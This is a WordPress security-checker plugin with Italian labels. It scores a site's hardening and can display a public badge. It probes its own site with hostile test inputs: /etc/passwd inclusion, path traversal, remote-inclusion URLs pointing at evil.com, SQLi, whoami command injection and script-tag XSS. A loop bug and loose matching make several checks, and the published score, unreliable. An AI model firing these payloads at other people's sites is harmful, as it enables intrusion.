<?php
/**
 * Plugin Name:  lean-bunker-security-checker
 * Description:  Verifica avanzata dell'hardening WordPress con punteggio 0-100. Badge pubblico opzionale per trasparenza sulla sicurezza (shortcode: [whc_security_badge]).
 * Version:      1.1.0
 * Author:       Riccardo
 * License:      GPL-3.0+
 */

if (!defined('ABSPATH')) {
    exit;
}

// Esegui solo in admin (non su frontend, CLI o AJAX)
if (defined('WP_CLI') && WP_CLI) {
    return;
} elseif (defined('DOING_AJAX') && DOING_AJAX) {
    return;
} elseif (!is_admin() && !shortcode_exists('whc_security_badge')) {
    if (get_option('whc_public_badge_enabled')) {
        add_shortcode('whc_security_badge', 'whc_render_security_badge');
    }
}

add_action('admin_menu', 'whc_add_admin_page');
function whc_add_admin_page() {
    if (!current_user_can('manage_options')) {
        return;
    }
    add_management_page(
        'Hardening Checker',
        'Hardening Checker',
        'manage_options',
        'wp-hardening-check',
        'whc_render_admin_page'
    );
}

add_action('admin_enqueue_scripts', 'whc_enqueue_scripts');
function whc_enqueue_scripts($hook) {
    if ($hook !== 'tools_page_wp-hardening-check') {
        return;
    }
    wp_enqueue_style('wp-hardening-check-style', false);
    $css = '
        .whc-check { margin: 6px 0; padding-left: 25px; font-family: monospace; }
        .whc-pass { color: #008000; }
        .whc-fail { color: #d63638; }
        .whc-info { color: #666; font-size: 0.9em; }
        .whc-score { font-size: 26px; font-weight: bold; margin: 20px 0; color: #2271b1; }
        .whc-section { margin-top: 25px; padding-top: 20px; border-top: 2px solid #f0f0f1; }
        .whc-subsection { margin-top: 15px; margin-bottom: 8px; font-weight: 600; color: #1d2327; }
        .whc-badge-preview { background: #f9f9f9; padding: 15px; border: 1px solid #ddd; margin-top: 10px; }
        .whc-segment { display: inline-block; width: 16.66%; height: 8px; }
        .whc-segment.green { background: #46b450; }
        .whc-segment.yellow { background: #ffb900; }
        .whc-segment.red { background: #dc3232; }
    ';
    wp_add_inline_style('wp-hardening-check-style', $css);
}

// ───────────────────────────────────────
// 🌐 FUNZIONE UNIVERSALE PER RICHIESTE REALISTICHE (aggiornata)
// ───────────────────────────────────────
function whc_safe_remote_request($url, $args = array()) {
    $default_args = array(
        'timeout'     => 8,
        'user-agent'  => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'headers'     => array(
            'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language' => 'it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7',
            'Accept-Encoding' => 'gzip, deflate',
            'Upgrade-Insecure-Requests' => '1',
        ),
        'sslverify'   => true,
        'redirection' => 5,
    );
    $args = wp_parse_args($args, $default_args);
    return wp_remote_get($url, $args);
}

function whc_safe_remote_post($url, $args = array()) {
    $default_args = array(
        'timeout'     => 8,
        'user-agent'  => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
        'headers'     => array(
            'Accept' => '*/*',
            'Accept-Language' => 'it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7',
        ),
        'sslverify'   => true,
        'redirection' => 5,
    );
    $args = wp_parse_args($args, $default_args);
    return wp_remote_post($url, $args);
}

// ───────────────────────────────────────
// 🛡️ SHORTCODE BADGE (FRONTEND) – identico alla 1.0.7
// ───────────────────────────────────────
function whc_render_security_badge() {
    if (!get_option('whc_public_badge_enabled')) {
        return '';
    }

    $last_report = get_option('whc_last_public_report');
    $last_check = get_option('whc_last_check_time');
    $cache_expires = $last_check + DAY_IN_SECONDS;

    if (!$last_report || time() > $cache_expires) {
        $report = whc_run_full_check();
        $last_report = array(
            'score' => $report['score'],
            'timestamp' => time(),
            'sections' => array()
        );
        foreach ($report['sections'] as $section_name => $subsections) {
            $section_score = 0;
            $section_possible = 0;
            foreach ($subsections as $checks) {
                foreach ($checks as $check) {
                    if (isset($check['points'])) {
                        $section_possible += $check['points'];
                        if ($check['status'] === 'pass') {
                            $section_score += $check['points'];
                        }
                    }
                }
            }
            $pct = $section_possible > 0 ? round(($section_score / $section_possible) * 100) : 100;
            $last_report['sections'][] = $pct;
        }
        update_option('whc_last_public_report', $last_report);
        update_option('whc_last_check_time', time());
    }

    $score = $last_report['score'];
    $date = gmdate('Y-m-d', $last_report['timestamp']);
    $site_name = parse_url(home_url(), PHP_URL_HOST);
    $segments = $last_report['sections'];

    $colors = array();
    foreach ($segments as $pct) {
        if ($pct >= 90) $colors[] = 'green';
        elseif ($pct >= 70) $colors[] = 'yellow';
        else $colors[] = 'red';
    }

    $unique_code = substr(hash_hmac('sha256', home_url() . '|' . $score . '|' . $date, NONCE_SALT), 0, 12);

    $output = '<div class="whc-security-badge" style="font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size: 13px; line-height: 1.4; max-width: 500px; margin: 20px 0;">';
    $output .= '<div style="display: flex; align-items: center; gap: 8px; margin-bottom: 6px;">';
    $output .= '<span style="font-weight: bold;">🔒 Sicurezza certificked</span>'; // ← mantenuto "certificked" come nella 1.0.7
    $output .= '<span>' . esc_html($site_name) . '</span>';
    $output .= '<span style="font-weight: bold;">' . esc_html($score) . '/100</span>';
    $output .= '<span>' . esc_html($date) . '</span>';
    $output .= '</div>';

    $output .= '<div style="display: flex; height: 8px; margin-bottom: 4px;">';
    foreach ($colors as $color) {
        $output .= '<span class="whc-segment ' . esc_attr($color) . '" style="flex: 1; background: ' . ($color === 'green' ? '#46b450' : ($color === 'yellow' ? '#ffb900' : '#dc3232')) . ';"></span>';
    }
    $output .= '</div>';

    $output .= '<div style="color: #666; font-size: 11px;">Audit: WordPress Hardening Checker v1.1.0 • Codice: ' . esc_html($unique_code) . '</div>';
    $output .= '</div>';

    return $output;
}

// ───────────────────────────────────────
// 🖥️ ADMIN PAGE
// ───────────────────────────────────────
function whc_render_admin_page() {
    if (!isset($_GET['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_GET['nonce'])), 'whc_run_check')) {
        $nonce = wp_create_nonce('whc_run_check');
        echo '<div class="wrap">';
        echo '<h1>🔍 WordPress Hardening Checker</h1>';
        echo '<p>Analisi basata su test reali: nessun falso positivo.</p>';
        echo '<a href="' . esc_url(add_query_arg('nonce', $nonce)) . '" class="button button-primary">Esegui l\'analisi di sicurezza</a>';
        echo '</div>';
        return;
    }

    $report = whc_run_full_check();
    $score  = $report['score'];
    update_option('whc_last_check_time', time());

    echo '<div class="wrap">';
    echo '<h1>🔍 WordPress Hardening Checker</h1>';
    echo '<div class="whc-score">Punteggio di sicurezza: <strong>' . esc_html($score) . '/100</strong></div>';

    if ($score >= 90) {
        echo '<div class="notice notice-success"><p>✅ Configurazione eccellente! Superfici di attacco ridotte al minimo.</p></div>';
    } elseif ($score >= 70) {
        echo '<div class="notice notice-warning"><p>⚠️ Configurazione buona, ma alcune superfici di attacco sono esposte.</p></div>';
    } else {
        echo '<div class="notice notice-error"><p>❌ Configurazione critica. Superfici di attacco significative rilevate.</p></div>';
    }

    foreach ($report['sections'] as $section_name => $subsections) {
        echo '<div class="whc-section"><h2>' . esc_html($section_name) . '</h2>';
        foreach ($subsections as $subsection_name => $checks) {
            echo '<div class="whc-subsection">' . esc_html($subsection_name) . '</div>';
            foreach ($checks as $check) {
                $class = $check['status'] === 'pass' ? 'whc-pass' : ($check['status'] === 'fail' ? 'whc-fail' : 'whc-info');
                echo '<div class="whc-check ' . esc_attr($class) . '">● ' . esc_html($check['name']) . ': ' . esc_html($check['message']) . '</div>';
            }
        }
        echo '</div>';
    }

    // ─── BADGE PUBBLICO ───
    echo '<div class="whc-section"><h2>🔖 Badge di Sicurezza Pubblico (certificked)</h2>';
    echo '<p>Mostra un badge nel frontend per dimostrare trasparenza sulla sicurezza. Usa lo shortcode <code>[whc_security_badge]</code> (es. nel footer).</p>';

    if (isset($_POST['whc_save_badge'])) {
        check_admin_referer('whc_save_badge');
        $enabled = !empty($_POST['whc_public_badge_enabled']);
        update_option('whc_public_badge_enabled', $enabled ? '1' : '');
        echo '<div class="notice notice-success"><p>Impostazioni badge salvate.</p></div>';
    }

    $badge_enabled = get_option('whc_public_badge_enabled');
    $last_report = get_option('whc_last_public_report');
    $unique_code = '';
    if ($last_report) {
        $date = gmdate('Y-m-d', $last_report['timestamp']);
        $unique_code = substr(hash_hmac('sha256', home_url() . '|' . $last_report['score'] . '|' . $date, NONCE_SALT), 0, 12);
    }

    echo '<form method="post">';
    wp_nonce_field('whc_save_badge');
    echo '<label><input type="checkbox" name="whc_public_badge_enabled" value="1" ' . checked($badge_enabled, '1', false) . '> Abilita shortcode <code>[whc_security_badge]</code></label><br><br>';
    echo '<button type="submit" name="whc_save_badge" class="button">Salva impostazioni badge</button>';
    echo '</form>';

    if ($badge_enabled && $last_report) {
        echo '<div class="whc-badge-preview">';
        echo do_shortcode('[whc_security_badge]');
        echo '</div>';
        echo '<p><small>Codice univoco: <code>' . esc_html($unique_code) . '</code> • Aggiornato ogni 24h</small></p>';
    }
    echo '</div>';

    $nonce = wp_create_nonce('whc_run_check');
    echo '<p><a href="' . esc_url(add_query_arg('nonce', $nonce)) . '" class="button">Riesegui l\'analisi</a></p>';
    echo '</div>';
}

// ───────────────────────────────────────
// 🔁 TUTTE LE FUNZIONI DI CHECK – con whc_safe_remote_request
// ───────────────────────────────────────

function whc_run_full_check() {
    $sections = array();

    $sections['📁 File System & Backup']       = whc_check_file_system();
    $sections['📡 Vettori di Attacco Web']     = whc_check_attack_vectors();
    $sections['🛡️ Header di Sicurezza']        = whc_check_security_headers(); // ← identica alla 1.0.7
    $sections['🧩 Funzionalità WordPress']     = whc_check_wp_features();
    $sections['⚙️ Configurazione Generale']    = whc_check_general_config();
    $sections['👥 Utenti & Autenticazione']    = whc_check_user_security();

    $total_score = 0;
    foreach ($sections as $subsection_groups) {
        foreach ($subsection_groups as $checks) {
            foreach ($checks as $check) {
                if (isset($check['points']) && $check['status'] === 'pass') {
                    $total_score += $check['points'];
                }
            }
        }
    }

    $final_score = min(100, max(0, (int) round($total_score)));
    return array('score' => $final_score, 'sections' => $sections);
}

// ───────────────────────────────────────
// 🔍 1. FILE SYSTEM & BACKUP – con whc_safe_remote_request
// ───────────────────────────────────────
function whc_check_file_system() {
    $files = array(
        'wp-config.php'               => '/wp-config.php',
        '.env'                        => '/.env',
        '.git/config'                 => '/.git/config',
        '.git/HEAD'                   => '/.git/HEAD',
        'composer.json'               => '/composer.json',
        'readme.html'                 => '/readme.html',
        'license.txt'                 => '/license.txt',
        'xmlrpc.php'                  => '/xmlrpc.php',
        'wp-admin/install.php'        => '/wp-admin/install.php',
        'wp-admin/setup-config.php'   => '/wp-admin/setup-config.php',
        'debug.log (root)'            => '/debug.log',
        'error_log (root)'            => '/error_log',
        'error.log (logs/)'           => '/logs/error.log',
        'backup.zip'                  => '/_backup.zip',
        'backup.tar.gz'               => '/backup.tar.gz',
        'database.sql'                => '/database.sql',
        'dump.sql'                    => '/dump.sql',
        'phpinfo.php'                 => '/phpinfo.php',
        'info.php'                    => '/info.php',
        'test.php'                    => '/test.php',
        'wp-content/debug.log'        => '/wp-content/debug.log',
        '.htaccess (root)'            => '/.htaccess',
        'uploads/.htaccess'           => '/wp-content/uploads/.htaccess',
    );

    $checks = array();
    foreach ($files as $name => $path) {
        $url = home_url($path);
        $response = whc_safe_remote_request($url, array('timeout' => 5, 'redirection' => 0, 'sslverify' => false));
        $code = wp_remote_retrieve_response_code($response);
        $body = wp_remote_retrieve_body($response);

        $is_protected = in_array($code, array(403, 404, 409, 410, 500)) ||
                        (strpos($body, 'Accesso negato') !== false) ||
                        (strpos($body, 'Forbidden') !== false) ||
                        (strpos($body, '403') !== false) ||
                        (strpos($body, '404') !== false) ||
                        ($code === 200 && (empty($body) || preg_match('/(Error|Warning|<b>Warning<\/b>)/i', $body)));

        if ($is_protected) {
            $checks[] = array('name' => $name, 'status' => 'pass', 'message' => 'Protetto (HTTP ' . $code . ')', 'points' => 1.2);
        } else {
            $checks[] = array('name' => $name, 'status' => 'fail', 'message' => 'ACCESSIBILE – Rischio critico (HTTP ' . $code . ')', 'points' => 0);
        }
    }
    return array('File esposti' => $checks);
}

// ───────────────────────────────────────
// 🔍 2. VETTORI DI ATTACCO WEB – con whc_safe_remote_request
// ───────────────────────────────────────
function whc_check_attack_vectors() {
    $vectors = array(
        'LFI: /etc/passwd'                 => '?file=/etc/passwd',
        'Path Traversal'                   => '?page=../../../etc/passwd',
        'RCE via lang'                     => '?lang=http://evil.com/shell.txt',
        'SQLi (boolean-based)'             => '?id=1%27+OR+%271%27%3D%271',
        'Command Injection'                => '?cmd=whoami',
        'eval() injection'                 => '?eval=phpinfo()',
        'XSS reflected'                    => '?q=<script>alert(1)</script>',
        'Open Redirect'                    => '?redirect=http://phishing.com',
        'Null Byte Injection'              => '?wp_lang=it_IT%00',
        'Remote File Inclusion (RFI)'      => '?page=http://evil.com/malicious.txt',
    );

    $checks = array();
    foreach ($vectors as $desc => $vec) {
        $url = home_url('/' . ltrim($vec, '?'));
        $response = whc_safe_remote_request($url, array('timeout' => 5, 'sslverify' => false));
        $code = wp_remote_retrieve_response_code($response);
        $body = wp_remote_retrieve_body($response);

        $danger_signs = array('/root:/', '/bin/bash', 'PHP Parse error', 'Warning:', 'mysql_fetch', 'uid=', 'gid=', 'syntax error', 'eval()', 'bool(', 'array(');
        $is_dangerous = ($code === 200 && strlen($body) > 100);

        if ($is_dangerous) {
            foreach ($danger_signs as $sign) {
                if (stripos($body, $sign) !== false) {
                    $is_dangerous = true;
                    break 2;
                }
            }
        }

        if ($is_dangerous) {
            $checks[] = array('name' => $desc, 'status' => 'fail', 'message' => 'Risposta sospetta – superficie esposta', 'points' => 0);
        } else {
            $checks[] = array('name' => $desc, 'status' => 'pass', 'message' => 'Nessun rischio rilevato', 'points' => 1.5);
        }
    }
    return array('Test vettori di attacco' => $checks);
}

// ───────────────────────────────────────
// 🔍 3. HEADER DI SICUREZZA – identica alla 1.0.7 (nessuna modifica)
// ───────────────────────────────────────
function whc_check_security_headers() {
    $url = home_url();
    $response = wp_remote_get($url, array('timeout' => 10, 'user-agent' => 'WHC/1.0.6'));

    if (wp_remote_retrieve_response_code($response) !== 200) {
        return array('Impossibile recuperare headers' => array(
            array('name' => 'Connessione', 'status' => 'info', 'message' => 'HTTP non 200', 'points' => 0)
        ));
    }

    $headers = wp_remote_retrieve_headers($response);
    if (is_object($headers) && method_exists($headers, 'getAll')) {
        $headers = $headers->getAll();
    } elseif (!is_array($headers)) {
        $headers = array();
    }
    $headers = array_change_key_case($headers, CASE_LOWER);

    $required = array(
        'Content-Security-Policy'         => array('key' => 'content-security-policy', 'points' => 4),
        'Cross-Origin-Embedder-Policy'    => array('key' => 'cross-origin-embedder-policy', 'points' => 3),
        'Cross-Origin-Opener-Policy'      => array('key' => 'cross-origin-opener-policy', 'points' => 3),
        'Cross-Origin-Resource-Policy'    => array('key' => 'cross-origin-resource-policy', 'points' => 3),
        'X-Content-Type-Options'          => array('key' => 'x-content-type-options', 'points' => 2),
        'X-Frame-Options'                 => array('key' => 'x-frame-options', 'points' => 2),
        'Referrer-Policy'                 => array('key' => 'referrer-policy', 'points' => 2),
        'Permissions-Policy'              => array('key' => 'permissions-policy', 'points' => 2),
        'Strict-Transport-Security'       => array('key' => 'strict-transport-security', 'points' => 4),
    );

    $checks = array();
    foreach ($required as $name => $config) {
        if (isset($headers[$config['key']])) {
            $checks[] = array('name' => $name, 'status' => 'pass', 'message' => 'Presente', 'points' => $config['points']);
        } else {
            $checks[] = array('name' => $name, 'status' => 'fail', 'message' => 'Mancante', 'points' => 0);
        }
    }
    return array('Security Headers' => $checks);
}

// ───────────────────────────────────────
// 🔍 4. FUNZIONALITÀ WORDPRESS – con whc_safe_remote_request
// ───────────────────────────────────────
function whc_check_wp_features() {
    $checks = array();

    // REST API
    $rest_test = whc_safe_remote_request(rest_url(), array('timeout' => 5));
    $rest_code = wp_remote_retrieve_response_code($rest_test);
    $rest_body = wp_remote_retrieve_body($rest_test);
    $rest_active = ($rest_code === 200 && (strpos($rest_body, '"namespaces"') !== false || strpos($rest_body, 'json') !== false));
    $checks['API & Endpoint']['REST API'] = array(
        'name' => 'REST API',
        'status' => !$rest_active ? 'pass' : 'fail',
        'message' => !$rest_active ? 'Disabilitata (HTTP ' . $rest_code . ')' : 'Accessibile (HTTP ' . $rest_code . ')',
        'points' => !$rest_active ? 8 : 0
    );

    // XML-RPC
    $xmlrpc_test = whc_safe_remote_post(home_url('/xmlrpc.php'), array(
        'timeout' => 5,
        'body' => '',
        'headers' => array('Content-Type' => 'text/xml')
    ));
    $xmlrpc_code = wp_remote_retrieve_response_code($xmlrpc_test);
    $xmlrpc_body = wp_remote_retrieve_body($xmlrpc_test);
    $xmlrpc_active = ($xmlrpc_code === 200 && strpos($xmlrpc_body, '<methodResponse>') !== false);
    $checks['API & Endpoint']['XML-RPC'] = array(
        'name' => 'XML-RPC',
        'status' => !$xmlrpc_active ? 'pass' : 'fail',
        'message' => !$xmlrpc_active ? 'Bloccato (HTTP ' . $xmlrpc_code . ')' : 'Accessibile',
        'points' => !$xmlrpc_active ? 4 : 0
    );

    // Heartbeat
    $heartbeat_test = whc_safe_remote_post(admin_url('admin-ajax.php'), array(
        'timeout' => 5,
        'body' => array('action' => 'heartbeat')
    ));
    $heartbeat_code = wp_remote_retrieve_response_code($heartbeat_test);
    $heartbeat_blocked = ($heartbeat_code !== 200);
    $checks['Funzionalità non necessarie']['Heartbeat'] = array(
        'name' => 'Heartbeat API',
        'status' => $heartbeat_blocked ? 'pass' : 'fail',
        'message' => $heartbeat_blocked ? 'Disabilitata' : 'Attiva',
        'points' => $heartbeat_blocked ? 3 : 0
    );

    // Gutenberg
    $gutenberg_off = apply_filters('use_block_editor_for_post_type', false, 'post') === false;
    $checks['Funzionalità non necessarie']['Gutenberg'] = array(
        'name' => 'Gutenberg',
        'status' => $gutenberg_off ? 'pass' : 'fail',
        'message' => $gutenberg_off ? 'Disabilitato' : 'Attivo',
        'points' => $gutenberg_off ? 3 : 0
    );

    // jQuery
    $jquery_off = !wp_script_is('jquery', 'enqueued') && !wp_script_is('jquery-core', 'enqueued');
    $checks['Funzionalità non necessarie']['jQuery'] = array(
        'name' => 'jQuery',
        'status' => $jquery_off ? 'pass' : 'info',
        'message' => $jquery_off ? 'Non caricato' : 'Caricato (bloat)',
        'points' => $jquery_off ? 2 : 0
    );

    // Emoji
    $emoji_off = !wp_script_is('wp-emoji-release', 'enqueued');
    $checks['Funzionalità non necessarie']['Emoji'] = array(
        'name' => 'Emoji',
        'status' => $emoji_off ? 'pass' : 'info',
        'message' => $emoji_off ? 'Disabilitati' : 'Attivi',
        'points' => $emoji_off ? 1 : 0
    );

    // Commenti
    $comments_off = true;
    foreach (get_post_types(array('public' => true)) as $pt) {
        if (post_type_supports($pt, 'comments')) {
            $comments_off = false;
            break;
        }
    }
    $checks['Contenuti & Interazione']['Commenti'] = array(
        'name' => 'Commenti',
        'status' => $comments_off ? 'pass' : 'fail',
        'message' => $comments_off ? 'Disabilitati globalmente' : 'Abilitati',
        'points' => $comments_off ? 4 : 0
    );

    // Feed RSS
    $feed_test = whc_safe_remote_request(home_url('/feed/'), array('timeout' => 5, 'redirection' => 0));
    $feed_code = wp_remote_retrieve_response_code($feed_test);
    $feed_protected = in_array($feed_code, array(403, 404, 409, 410, 500));
    $checks['Contenuti & Interazione']['Feed RSS'] = array(
        'name' => 'Feed RSS',
        'status' => $feed_protected ? 'pass' : 'fail',
        'message' => $feed_protected ? 'Disabilitati (HTTP ' . $feed_code . ')' : 'Accessibili (HTTP ' . $feed_code . ')',
        'points' => $feed_protected ? 3 : 0
    );

    return $checks;
}

// ───────────────────────────────────────
// 🔍 5. CONFIGURAZIONE GENERALE – con whc_safe_remote_request
// ───────────────────────────────────────
function whc_check_general_config() {
    $checks = array();

    $https = strpos(home_url(), 'https://') === 0;
    $checks['Protocollo & Privacy']['HTTPS'] = array(
        'name' => 'HTTPS',
        'status' => $https ? 'pass' : 'fail',
        'message' => $https ? 'Attivo' : 'Non attivo',
        'points' => $https ? 5 : 0
    );

    $source = wp_remote_retrieve_body(whc_safe_remote_request(home_url(), array('timeout' => 8)));
    $version_exposed = (bool) preg_match('/content=["\']WordPress [\d\.]+/i', $source)
                       || preg_match('/<meta name=["\']generator/i', $source);
    $checks['Protocollo & Privacy']['Versione WP esposta'] = array(
        'name' => 'Versione WP esposta',
        'status' => !$version_exposed ? 'pass' : 'fail',
        'message' => !$version_exposed ? 'Nascosta' : 'Trovata nel sorgente',
        'points' => !$version_exposed ? 4 : 0
    );

    $file_edit = defined('DISALLOW_FILE_EDIT') && DISALLOW_FILE_EDIT;
    $checks['Sicurezza amministrazione']['File editors'] = array(
        'name' => 'File editors (theme/plugin)',
        'status' => $file_edit ? 'pass' : 'fail',
        'message' => $file_edit ? 'Disabilitati' : 'Abilitati',
        'points' => $file_edit ? 3 : 0
    );

    $debug_off = !defined('WP_DEBUG') || !WP_DEBUG;
    $checks['Sicurezza amministrazione']['WP_DEBUG'] = array(
        'name' => 'WP_DEBUG',
        'status' => $debug_off ? 'pass' : 'fail',
        'message' => $debug_off ? 'Disabilitato' : 'Attivo in produzione',
        'points' => $debug_off ? 3 : 0
    );

    $cron_test = whc_safe_remote_request(home_url('/wp-cron.php'), array('timeout' => 3));
    $cron_code = wp_remote_retrieve_response_code($cron_test);
    $cron_protected = in_array($cron_code, array(403, 404, 409));
    $checks['Prestazioni & Sicurezza']['wp-cron.php'] = array(
        'name' => 'wp-cron.php',
        'status' => $cron_protected ? 'pass' : 'info',
        'message' => $cron_protected ? 'Disabilitato/protetto' : 'Accessibile (usa cron reale)',
        'points' => $cron_protected ? 2 : 0
    );

    return $checks;
}

// ───────────────────────────────────────
// 🔍 6. UTENTI & AUTENTICAZIONE – con whc_safe_remote_request
// ───────────────────────────────────────
function whc_check_user_security() {
    $checks = array();

    $author_test = whc_safe_remote_request(home_url('/?author=1'), array('timeout' => 4));
    $author_code = wp_remote_retrieve_response_code($author_test);
    $author_body = wp_remote_retrieve_body($author_test);
    $user_enum_blocked = !($author_code === 200 && (stripos($author_body, 'author') !== false || stripos($author_body, get_bloginfo('name')) !== false));
    $checks['Enumerazione utenti']['?author=1'] = array(
        'name' => 'Enumerazione utenti (?author=1)',
        'status' => $user_enum_blocked ? 'pass' : 'fail',
        'message' => $user_enum_blocked ? 'Bloccata' : 'Possibile (HTTP ' . $author_code . ')',
        'points' => $user_enum_blocked ? 4 : 0
    );

    return $checks;
}